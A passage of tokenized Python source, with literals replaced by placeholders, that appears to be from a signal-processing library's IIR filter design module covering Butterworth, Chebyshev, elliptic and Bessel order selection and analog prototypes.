, analog = False ) : <EOL> """<STR_LIT>""" <EOL> wp = atleast_1d ( wp ) <EOL> ws = atleast_1d ( ws ) <EOL> filter_type = <NUM_LIT:2> * ( len ( wp ) - <NUM_LIT:1> ) <EOL> filter_type += <NUM_LIT:1> <EOL> if wp [ <NUM_LIT:0> ] >= ws [ <NUM_LIT:0> ] : <EOL> filter_type += <NUM_LIT:1> <EOL> if not analog : <EOL> passb = tan ( pi * wp / <NUM_LIT> ) <EOL> stopb = tan ( pi * ws / <NUM_LIT> ) <EOL> else : <EOL> passb = wp * <NUM_LIT:1.0> <EOL> stopb = ws * <NUM_LIT:1.0> <EOL> if filter_type == <NUM_LIT:1> : <EOL> nat = stopb / passb <EOL> elif filter_type == <NUM_LIT:2> : <EOL> nat = passb / stopb <EOL> elif filter_type == <NUM_LIT:3> : <EOL> wp0 = optimize . fminbound ( band_stop_obj , passb [ <NUM_LIT:0> ] , stopb [ <NUM_LIT:0> ] - <NUM_LIT> , <EOL> args = ( <NUM_LIT:0> , passb , stopb , gpass , gstop , <EOL> '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:0> ] = wp0 <EOL> wp1 = optimize . fminbound ( band_stop_obj , stopb [ <NUM_LIT:1> ] + <NUM_LIT> , passb [ <NUM_LIT:1> ] , <EOL> args = ( <NUM_LIT:1> , passb , stopb , gpass , gstop , <EOL> '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:1> ] = wp1 <EOL> nat = ( ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) / <EOL> ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) ) <EOL> elif filter_type == <NUM_LIT:4> : <EOL> nat = ( ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) / <EOL> ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) ) <EOL> nat = min ( abs ( nat ) ) <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gstop ) ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gpass ) ) <EOL> ord = int ( ceil ( log10 ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) / ( <NUM_LIT:2> * log10 ( nat ) ) ) ) <EOL> try : <EOL> W0 = ( GPASS - <NUM_LIT:1.0> ) ** ( - <NUM_LIT:1.0> / ( <NUM_LIT> * ord ) ) <EOL> except ZeroDivisionError : <EOL> W0 = <NUM_LIT:1.0> <EOL> print ( "<STR_LIT>" ) <EOL> if filter_type == <NUM_LIT:1> : <EOL> WN = W0 * passb <EOL> elif filter_type == <NUM_LIT:2> : <EOL> WN = passb / W0 <EOL> elif filter_type == <NUM_LIT:3> : <EOL> WN = numpy . zeros ( <NUM_LIT:2> , float ) <EOL> discr = sqrt ( ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> + <EOL> <NUM_LIT:4> * W0 ** <NUM_LIT:2> * passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) <EOL> WN [ <NUM_LIT:0> ] = ( ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) + discr ) / ( <NUM_LIT:2> * W0 ) <EOL> WN [ <NUM_LIT:1> ] = ( ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) - discr ) / ( <NUM_LIT:2> * W0 ) <EOL> WN = numpy . sort ( abs ( WN ) ) <EOL> elif filter_type == <NUM_LIT:4> : <EOL> W0 = numpy . array ( [ - W0 , W0 ] , float ) <EOL> WN = ( - W0 * ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) / <NUM_LIT> + <EOL> sqrt ( W0 ** <NUM_LIT:2> / <NUM_LIT> * ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> + <EOL> passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) ) <EOL> WN = numpy . sort ( abs ( WN ) ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % filter_type ) <EOL> if not analog : <EOL> wn = ( <NUM_LIT> / pi ) * arctan ( WN ) <EOL> else : <EOL> wn = WN <EOL> if len ( wn ) == <NUM_LIT:1> : <EOL> wn = wn [ <NUM_LIT:0> ] <EOL> return ord , wn <EOL> def cheb1ord ( wp , ws , gpass , gstop , analog = False ) : <EOL> """<STR_LIT>""" <EOL> wp = atleast_1d ( wp ) <EOL> ws = atleast_1d ( ws ) <EOL> filter_type = <NUM_LIT:2> * ( len ( wp ) - <NUM_LIT:1> ) <EOL> if wp [ <NUM_LIT:0> ] < ws [ <NUM_LIT:0> ] : <EOL> filter_type += <NUM_LIT:1> <EOL> else : <EOL> filter_type += <NUM_LIT:2> <EOL> if not analog : <EOL> passb = tan ( pi * wp / <NUM_LIT> ) <EOL> stopb = tan ( pi * ws / <NUM_LIT> ) <EOL> else : <EOL> passb = wp * <NUM_LIT:1.0> <EOL> stopb = ws * <NUM_LIT:1.0> <EOL> if filter_type == <NUM_LIT:1> : <EOL> nat = stopb / passb <EOL> elif filter_type == <NUM_LIT:2> : <EOL> nat = passb / stopb <EOL> elif filter_type == <NUM_LIT:3> : <EOL> wp0 = optimize . fminbound ( band_stop_obj , passb [ <NUM_LIT:0> ] , stopb [ <NUM_LIT:0> ] - <NUM_LIT> , <EOL> args = ( <NUM_LIT:0> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:0> ] = wp0 <EOL> wp1 = optimize . fminbound ( band_stop_obj , stopb [ <NUM_LIT:1> ] + <NUM_LIT> , passb [ <NUM_LIT:1> ] , <EOL> args = ( <NUM_LIT:1> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:1> ] = wp1 <EOL> nat = ( ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) / <EOL> ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) ) <EOL> elif filter_type == <NUM_LIT:4> : <EOL> nat = ( ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) / <EOL> ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) ) <EOL> nat = min ( abs ( nat ) ) <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gstop ) ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gpass ) ) <EOL> ord = int ( ceil ( arccosh ( sqrt ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) ) / <EOL> arccosh ( nat ) ) ) <EOL> if not analog : <EOL> wn = ( <NUM_LIT> / pi ) * arctan ( passb ) <EOL> else : <EOL> wn = passb <EOL> if len ( wn ) == <NUM_LIT:1> : <EOL> wn = wn [ <NUM_LIT:0> ] <EOL> return ord , wn <EOL> def cheb2ord ( wp , ws , gpass , gstop , analog = False ) : <EOL> """<STR_LIT>""" <EOL> wp = atleast_1d ( wp ) <EOL> ws = atleast_1d ( ws ) <EOL> filter_type = <NUM_LIT:2> * ( len ( wp ) - <NUM_LIT:1> ) <EOL> if wp [ <NUM_LIT:0> ] < ws [ <NUM_LIT:0> ] : <EOL> filter_type += <NUM_LIT:1> <EOL> else : <EOL> filter_type += <NUM_LIT:2> <EOL> if not analog : <EOL> passb = tan ( pi * wp / <NUM_LIT> ) <EOL> stopb = tan ( pi * ws / <NUM_LIT> ) <EOL> else : <EOL> passb = wp * <NUM_LIT:1.0> <EOL> stopb = ws * <NUM_LIT:1.0> <EOL> if filter_type == <NUM_LIT:1> : <EOL> nat = stopb / passb <EOL> elif filter_type == <NUM_LIT:2> : <EOL> nat = passb / stopb <EOL> elif filter_type == <NUM_LIT:3> : <EOL> wp0 = optimize . fminbound ( band_stop_obj , passb [ <NUM_LIT:0> ] , stopb [ <NUM_LIT:0> ] - <NUM_LIT> , <EOL> args = ( <NUM_LIT:0> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:0> ] = wp0 <EOL> wp1 = optimize . fminbound ( band_stop_obj , stopb [ <NUM_LIT:1> ] + <NUM_LIT> , passb [ <NUM_LIT:1> ] , <EOL> args = ( <NUM_LIT:1> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:1> ] = wp1 <EOL> nat = ( ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) / <EOL> ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) ) <EOL> elif filter_type == <NUM_LIT:4> : <EOL> nat = ( ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) / <EOL> ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) ) <EOL> nat = min ( abs ( nat ) ) <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gstop ) ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gpass ) ) <EOL> ord = int ( ceil ( arccosh ( sqrt ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) ) / <EOL> arccosh ( nat ) ) ) <EOL> new_freq = cosh ( <NUM_LIT:1.0> / ord * arccosh ( sqrt ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) ) ) <EOL> new_freq = <NUM_LIT:1.0> / new_freq <EOL> if filter_type == <NUM_LIT:1> : <EOL> nat = passb / new_freq <EOL> elif filter_type == <NUM_LIT:2> : <EOL> nat = passb * new_freq <EOL> elif filter_type == <NUM_LIT:3> : <EOL> nat = numpy . zeros ( <NUM_LIT:2> , float ) <EOL> nat [ <NUM_LIT:0> ] = ( new_freq / <NUM_LIT> * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) + <EOL> sqrt ( new_freq ** <NUM_LIT:2> * ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> / <NUM_LIT> + <EOL> passb [ <NUM_LIT:1> ] * passb [ <NUM_LIT:0> ] ) ) <EOL> nat [ <NUM_LIT:1> ] = passb [ <NUM_LIT:1> ] * passb [ <NUM_LIT:0> ] / nat [ <NUM_LIT:0> ] <EOL> elif filter_type == <NUM_LIT:4> : <EOL> nat = numpy . zeros ( <NUM_LIT:2> , float ) <EOL> nat [ <NUM_LIT:0> ] = ( <NUM_LIT:1.0> / ( <NUM_LIT> * new_freq ) * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) + <EOL> sqrt ( ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> / ( <NUM_LIT> * new_freq ** <NUM_LIT:2> ) + <EOL> passb [ <NUM_LIT:1> ] * passb [ <NUM_LIT:0> ] ) ) <EOL> nat [ <NUM_LIT:1> ] = passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] / nat [ <NUM_LIT:0> ] <EOL> if not analog : <EOL> wn = ( <NUM_LIT> / pi ) * arctan ( nat ) <EOL> else : <EOL> wn = nat <EOL> if len ( wn ) == <NUM_LIT:1> : <EOL> wn = wn [ <NUM_LIT:0> ] <EOL> return ord , wn <EOL> def ellipord ( wp , ws , gpass , gstop , analog = False ) : <EOL> """<STR_LIT>""" <EOL> wp = atleast_1d ( wp ) <EOL> ws = atleast_1d ( ws ) <EOL> filter_type = <NUM_LIT:2> * ( len ( wp ) - <NUM_LIT:1> ) <EOL> filter_type += <NUM_LIT:1> <EOL> if wp [ <NUM_LIT:0> ] >= ws [ <NUM_LIT:0> ] : <EOL> filter_type += <NUM_LIT:1> <EOL> if not analog : <EOL> passb = tan ( pi * wp / <NUM_LIT> ) <EOL> stopb = tan ( pi * ws / <NUM_LIT> ) <EOL> else : <EOL> passb = wp * <NUM_LIT:1.0> <EOL> stopb = ws * <NUM_LIT:1.0> <EOL> if filter_type == <NUM_LIT:1> : <EOL> nat = stopb / passb <EOL> elif filter_type == <NUM_LIT:2> : <EOL> nat = passb / stopb <EOL> elif filter_type == <NUM_LIT:3> : <EOL> wp0 = optimize . fminbound ( band_stop_obj , passb [ <NUM_LIT:0> ] , stopb [ <NUM_LIT:0> ] - <NUM_LIT> , <EOL> args = ( <NUM_LIT:0> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:0> ] = wp0 <EOL> wp1 = optimize . fminbound ( band_stop_obj , stopb [ <NUM_LIT:1> ] + <NUM_LIT> , passb [ <NUM_LIT:1> ] , <EOL> args = ( <NUM_LIT:1> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:1> ] = wp1 <EOL> nat = ( ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) / <EOL> ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) ) <EOL> elif filter_type == <NUM_LIT:4> : <EOL> nat = ( ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) / <EOL> ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) ) <EOL> nat = min ( abs ( nat ) ) <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * gstop ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * gpass ) <EOL> arg1 = sqrt ( ( GPASS - <NUM_LIT:1.0> ) / ( GSTOP - <NUM_LIT:1.0> ) ) <EOL> arg0 = <NUM_LIT:1.0> / nat <EOL> d0 = special . ellipk ( [ arg0 ** <NUM_LIT:2> , <NUM_LIT:1> - arg0 ** <NUM_LIT:2> ] ) <EOL> d1 = special . ellipk ( [ arg1 ** <NUM_LIT:2> , <NUM_LIT:1> - arg1 ** <NUM_LIT:2> ] ) <EOL> ord = int ( ceil ( d0 [ <NUM_LIT:0> ] * d1 [ <NUM_LIT:1> ] / ( d0 [ <NUM_LIT:1> ] * d1 [ <NUM_LIT:0> ] ) ) ) <EOL> if not analog : <EOL> wn = arctan ( passb ) * <NUM_LIT> / pi <EOL> else : <EOL> wn = passb <EOL> if len ( wn ) == <NUM_LIT:1> : <EOL> wn = wn [ <NUM_LIT:0> ] <EOL> return ord , wn <EOL> def buttap ( N ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( N ) ) != N : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> z = numpy . array ( [ ] ) <EOL> m = numpy . arange ( - N + <NUM_LIT:1> , N , <NUM_LIT:2> ) <EOL> p = - numpy . exp ( <NUM_LIT> * pi * m / ( <NUM_LIT:2> * N ) ) <EOL> k = <NUM_LIT:1> <EOL> return z , p , k <EOL> def cheb1ap ( N , rp ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( N ) ) != N : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif N == <NUM_LIT:0> : <EOL> return numpy . array ( [ ] ) , numpy . array ( [ ] ) , <NUM_LIT:10> ** ( - rp / <NUM_LIT:20> ) <EOL> z = numpy . array ( [ ] ) <EOL> eps = numpy . sqrt ( <NUM_LIT:10> ** ( <NUM_LIT:0.1> * rp ) - <NUM_LIT:1.0> ) <EOL> mu = <NUM_LIT:1.0> / N * arcsinh ( <NUM_LIT:1> / eps ) <EOL> m = numpy . arange ( - N + <NUM_LIT:1> , N , <NUM_LIT:2> ) <EOL> theta = pi * m / ( <NUM_LIT:2> * N ) <EOL> p = - sinh ( mu + <NUM_LIT> * theta ) <EOL> k = numpy . prod ( - p , axis = <NUM_LIT:0> ) . real <EOL> if N % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> k = k / sqrt ( ( <NUM_LIT:1> + eps * eps ) ) <EOL> return z , p , k <EOL> def cheb2ap ( N , rs ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( N ) ) != N : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif N == <NUM_LIT:0> : <EOL> return numpy . array ( [ ] ) , numpy . array ( [ ] ) , <NUM_LIT:1> <EOL> de = <NUM_LIT:1.0> / sqrt ( <NUM_LIT:10> ** ( <NUM_LIT:0.1> * rs ) - <NUM_LIT:1> ) <EOL> mu = arcsinh ( <NUM_LIT:1.0> / de ) / N <EOL> if N % <NUM_LIT:2> : <EOL> m = numpy . concatenate ( ( numpy . arange ( - N + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> ) , <EOL> numpy . arange ( <NUM_LIT:2> , N , <NUM_LIT:2> ) ) ) <EOL> else : <EOL> m = numpy . arange ( - N + <NUM_LIT:1> , N , <NUM_LIT:2> ) <EOL> z = - conjugate ( <NUM_LIT> / sin ( m * pi / ( <NUM_LIT> * N ) ) ) <EOL> p = - exp ( <NUM_LIT> * pi * numpy . arange ( - N + <NUM_LIT:1> , N , <NUM_LIT:2> ) / ( <NUM_LIT:2> * N ) ) <EOL> p = sinh ( mu ) * p . real + <NUM_LIT> * cosh ( mu ) * p . imag <EOL> p = <NUM_LIT:1.0> / p <EOL> k = ( numpy . prod ( - p , axis = <NUM_LIT:0> ) / numpy . prod ( - z , axis = <NUM_LIT:0> ) ) . real <EOL> return z , p , k <EOL> EPSILON = <NUM_LIT> <EOL> def _vratio ( u , ineps , mp ) : <EOL> [ s , c , d , phi ] = special . ellipj ( u , mp ) <EOL> ret = abs ( ineps - s / c ) <EOL> return ret <EOL> def _kratio ( m , k_ratio ) : <EOL> m = float ( m ) <EOL> if m < <NUM_LIT:0> : <EOL> m = <NUM_LIT:0.0> <EOL> if m > <NUM_LIT:1> : <EOL> m = <NUM_LIT:1.0> <EOL> if abs ( m ) > EPSILON and ( abs ( m ) + EPSILON ) < <NUM_LIT:1> : <EOL> k = special . ellipk ( [ m , <NUM_LIT:1> - m ] ) <EOL> r = k [ <NUM_LIT:0> ] / k [ <NUM_LIT:1> ] - k_ratio <EOL> elif abs ( m ) > EPSILON : <EOL> r = - k_ratio <EOL> else : <EOL> r = <NUM_LIT> <EOL> return abs ( r ) <EOL> def ellipap ( N , rp , rs ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( N ) ) != N : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif N == <NUM_LIT:0> : <EOL> return numpy . array ( [ ] ) , numpy . array ( [ ] ) , <NUM_LIT:10> ** ( - rp / <NUM_LIT:20> ) <EOL> elif N == <NUM_LIT:1> : <EOL> p = - sqrt ( <NUM_LIT:1.0> / ( <NUM_LIT:10> ** ( <NUM_LIT:0.1> * rp ) - <NUM_LIT:1.0> ) ) <EOL> k = - p <EOL> z = [ ] <EOL> return asarray ( z ) , asarray ( p ) , k <EOL> eps = numpy . sqrt ( <NUM_LIT:10> ** ( <NUM_LIT:0.1> * rp ) - <NUM_LIT:1> ) <EOL> ck1 = eps / numpy . sqrt ( <NUM_LIT:10> ** ( <NUM_LIT:0.1> * rs ) - <NUM_LIT:1> ) <EOL> ck1p = numpy . sqrt ( <NUM_LIT:1> - ck1 * ck1 ) <EOL> if ck1p == <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> val = special . ellipk ( [ ck1 * ck1 , ck1p * ck1p ] ) <EOL> if abs ( <NUM_LIT:1> - ck1p * ck1p ) < EPSILON : <EOL> krat = <NUM_LIT:0> <EOL> else : <EOL> krat = N * val [ <NUM_LIT:0> ] / val [ <NUM_LIT:1> ] <EOL> m = optimize . fmin ( _kratio , [ <NUM_LIT:0.5> ] , args = ( krat , ) , maxfun = <NUM_LIT> , maxiter = <NUM_LIT> , <EOL> disp = <NUM_LIT:0> ) <EOL> if m < <NUM_LIT:0> or m > <NUM_LIT:1> : <EOL> m = optimize . fminbound ( _kratio , <NUM_LIT:0> , <NUM_LIT:1> , args = ( krat , ) , maxfun = <NUM_LIT> , <EOL> maxiter = <NUM_LIT> , disp = <NUM_LIT:0> ) <EOL> capk = special . ellipk ( m ) <EOL> j = numpy . arange ( <NUM_LIT:1> - N % <NUM_LIT:2> , N , <NUM_LIT:2> ) <EOL> jj = len ( j ) <EOL> [ s , c , d , phi ] = special . ellipj ( j * capk / N , m * numpy . ones ( jj ) ) <EOL> snew = numpy . compress ( abs ( s ) > EPSILON , s , axis = - <NUM_LIT:1> ) <EOL> z = <NUM_LIT:1.0> / ( sqrt ( m ) * snew ) <EOL> z = <NUM_LIT> * z <EOL> z = numpy . concatenate ( ( z , conjugate ( z ) ) ) <EOL> r = optimize . fmin ( _vratio , special . ellipk ( m ) , args = ( <NUM_LIT:1.> / eps , ck1p * ck1p ) , <EOL> maxfun = <NUM_LIT> , maxiter = <NUM_LIT> , disp = <NUM_LIT:0> ) <EOL> v0 = capk * r / ( N * val [ <NUM_LIT:0> ] ) <EOL> [ sv , cv , dv , phi ] = special . ellipj ( v0 , <NUM_LIT:1> - m ) <EOL> p = - ( c * d * sv * cv + <NUM_LIT> * s * dv ) / ( <NUM_LIT:1> - ( d * sv ) ** <NUM_LIT> ) <EOL> if N % <NUM_LIT:2> : <EOL> newp = numpy . compress ( abs ( p . imag ) > EPSILON * <EOL> numpy . sqrt ( numpy . sum ( p * numpy . conjugate ( p ) , <EOL> axis = <NUM_LIT:0> ) . real ) , <EOL> p , axis = - <NUM_LIT:1> ) <EOL> p = numpy . concatenate ( ( p , conjugate ( newp ) ) ) <EOL> else : <EOL> p = numpy . concatenate ( ( p , conjugate ( p ) ) ) <EOL> k = ( numpy . prod ( - p , axis = <NUM_LIT:0> ) / numpy . prod ( - z , axis = <NUM_LIT:0> ) ) . real <EOL> if N % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> k = k / numpy . sqrt ( ( <NUM_LIT:1> + eps * eps ) ) <EOL> return z , p , k <EOL> def _bessel_poly ( n , reverse = False ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( n ) ) != n : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> n = int ( n ) <EOL> out = [ ] <EOL> for k in range ( n + <NUM_LIT:1> ) : <EOL> num = factorial ( <NUM_LIT:2> * n - k , exact = True ) <EOL> den = <NUM_LIT:2> ** ( n - k ) * ( factorial ( k , exact = True ) * <EOL> factorial ( n - k , exact = True ) ) <EOL> out . append ( num // den ) <EOL> if reverse : <EOL> return out [ : : - <NUM_LIT:1> ] <EOL> else : <EOL> return out <EOL> def _campos_zeros ( n ) : <EOL> """<STR_LIT>""" <EOL> if n == <NUM_LIT:1> : <EOL> return asarray ( [ - <NUM_LIT:1> + <NUM_LIT> ] ) <EOL> s = npp_polyval ( n , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> , - <NUM_LIT:3> , <NUM_LIT:1> ] ) <EOL> b3 = npp_polyval ( n , [ <NUM_LIT:16> , - <NUM_LIT:8> ] ) / s <EOL> b2 = npp_polyval ( n , [ - <NUM_LIT> , - <NUM_LIT:12> , <NUM_LIT:12> ] ) / s <EOL> b1 = npp_polyval ( n , [ <NUM_LIT:8> , <NUM_LIT> , - <NUM_LIT:12> , - <NUM_LIT:2> ] ) / s <EOL> b0 = npp_polyval ( n , [ <NUM_LIT:0> , - <NUM_LIT:6> , <NUM_LIT:0> , <NUM_LIT:5> , - <NUM_LIT:1> ] ) / s <EOL> r = npp_polyval ( n , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> a1 = npp_polyval ( n , [ - <NUM_LIT:6> , - <NUM_LIT:6> ] ) / r <EOL> a2 = <NUM_LIT:6> / r <EOL> k = np . arange ( <NUM_LIT:1> , n + <NUM_LIT:1> ) <EOL> x = npp_polyval ( k , [ <NUM_LIT:0> , a1 , a2 ] ) <EOL> y = npp_polyval ( k , [ b0 , b1 , b2 , b3 ] ) <EOL> return x + <NUM_LIT> * y <EOL> def _aberth ( f , fp , x0 , tol = <NUM_LIT> , maxiter = <NUM_LIT:50> ) : <EOL> """<STR_LIT>""" <EOL> N = len ( x0 ) <EOL> x = array ( x0 , complex ) <EOL> beta = np . empty_like ( x0 ) <EOL> for iteration in range ( maxiter ) : <EOL> alpha = - f ( x ) / fp ( x ) <EOL> for k in range ( N ) : <EOL> beta [ k ] = np . sum ( <NUM_LIT:1> / ( x [ k ] - x [ k + <NUM_LIT:1> : ] ) ) <EOL> beta [ k ] += np . sum ( <NUM_LIT:1> / ( x [ k ] - x [ : k ] ) ) <EOL> x += alpha / ( <NUM_LIT:1> + alpha * beta ) <EOL> if not all ( np . isfinite ( x ) ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if all ( abs ( alpha ) <= tol ) : <EOL> break <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> return x <EOL> def _bessel_zeros ( N ) : <EOL> """<STR_LIT>""" <EOL> if N == <NUM_LIT:0> : <EOL> return asarray ( [ ] ) <EOL> x0 = _campos_zeros ( N ) <EOL> def f ( x ) : <EOL> return special . kve ( N + <NUM_LIT:0.5> , <NUM_LIT:1> / x ) <EOL> def fp ( x ) : <EOL> return ( special . kve ( N - <NUM_LIT:0.5> , <NUM_LIT:1> / x ) / ( <NUM_LIT:2> * x ** <NUM_LIT:2> ) - <EOL> special . kve ( N + <NUM_LIT:0.5> , <NUM_LIT:1> / x ) / ( x ** <NUM_LIT:2> ) + <EOL> special . kve ( N + <NUM_LIT> , <NUM_LIT:1> / x ) / ( <NUM_LIT:2> * x ** <NUM_LIT:2> ) ) <EOL> x = _aberth ( f , fp , x0 ) <EOL> for i in range ( len ( x ) ) : <EOL> x [ i ] = optimize . newton ( f , x [ i ] , fp , tol = <NUM_LIT> ) <EOL> x = np . mean ( ( x , x [ : : - <NUM_LIT:1> ] . conj ( ) ) , <NUM_LIT:0> ) <EOL> if abs ( np . sum ( x ) + <NUM_LIT:1> ) > <NUM_LIT> : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return x <EOL> def _norm_factor ( a ) : <EOL> """<STR_LIT>""" <EOL> a = asarray ( a , dtype = float ) <EOL> def G ( w ) : <EOL> """<STR_LIT>""" <EOL> return abs ( a [ - <NUM_LIT:1> ] / npp_polyval ( <NUM_LIT> * w , a [ : : - <NUM_LIT:1> ] ) ) <EOL> def cutoff ( w ) : <EOL> """<STR_LIT>""" <EOL> return G ( w ) - <NUM_LIT:1> / np . sqrt ( <NUM_LIT:2> ) <EOL> return optimize . newton ( cutoff , <NUM_LIT> ) <EOL> def besselap ( N , norm = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( N ) ) != N : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if N == <NUM_LIT:0> : <EOL> p = [ ] <EOL> k = <NUM_LIT:1> <EOL> else : <EOL> p = <NUM_LIT:1> / _bessel_zeros ( N ) <EOL> a = _bessel_poly ( N , reverse = True ) <EOL> if norm == '<STR_LIT>' : <EOL> k = a [ - <NUM_LIT:1> ] <EOL> elif norm == '<STR_LIT>' : <EOL> p *= <NUM_LIT:10> ** ( - math . log10 ( a [ - <NUM_LIT:1> ] ) / N ) <EOL> k = <NUM_LIT:1> <EOL> elif norm == '<STR_LIT>' : <EOL> norm_factor = _norm_factor ( a ) <EOL> p /= norm_factor <EOL> k = norm_factor ** - N * a [ - <NUM_LIT:1> ] <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return asarray ( [ ] ) , asarray ( p , dtype = complex ) , float ( k ) <EOL> filter_dict = { '<STR_LIT>' : [ buttap , buttord ] , <EOL> '<STR_LIT>' : [ buttap , buttord ] , <EOL> '<STR_LIT>' : [ ellipap , ellipord ] , <EOL> '<STR_LIT>' : [ ellipap , ellipord ] , <EOL> '<STR_LIT>' : [ ellipap , ellipord ] , <EOL> '<STR_LIT>' : [ besselap ] , <EOL> '<STR_LIT>' : [ besselap ] , <EOL> '<STR_LIT>' : [ besselap ] , <EOL> '<STR_LIT>' : [ besselap ] , <EOL> '<STR_LIT>' : [ cheb1ap , cheb1ord ] , <EOL> '<STR_LIT>' : [ cheb1ap , cheb1ord ] , <EOL> '<STR_LIT>' : [ cheb1ap , cheb1ord ] , <EOL> '<STR_LIT>' : [ cheb2ap , cheb2ord ] , <EOL> '<STR_LIT>' : [ cheb2ap , cheb2ord ] , <EOL> '<STR_LIT>' : [ cheb2ap , cheb2ord ] , <EOL> } <EOL> band_dict = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:l>' : '<STR_LIT>' , <EOL> '<STR_LIT>' 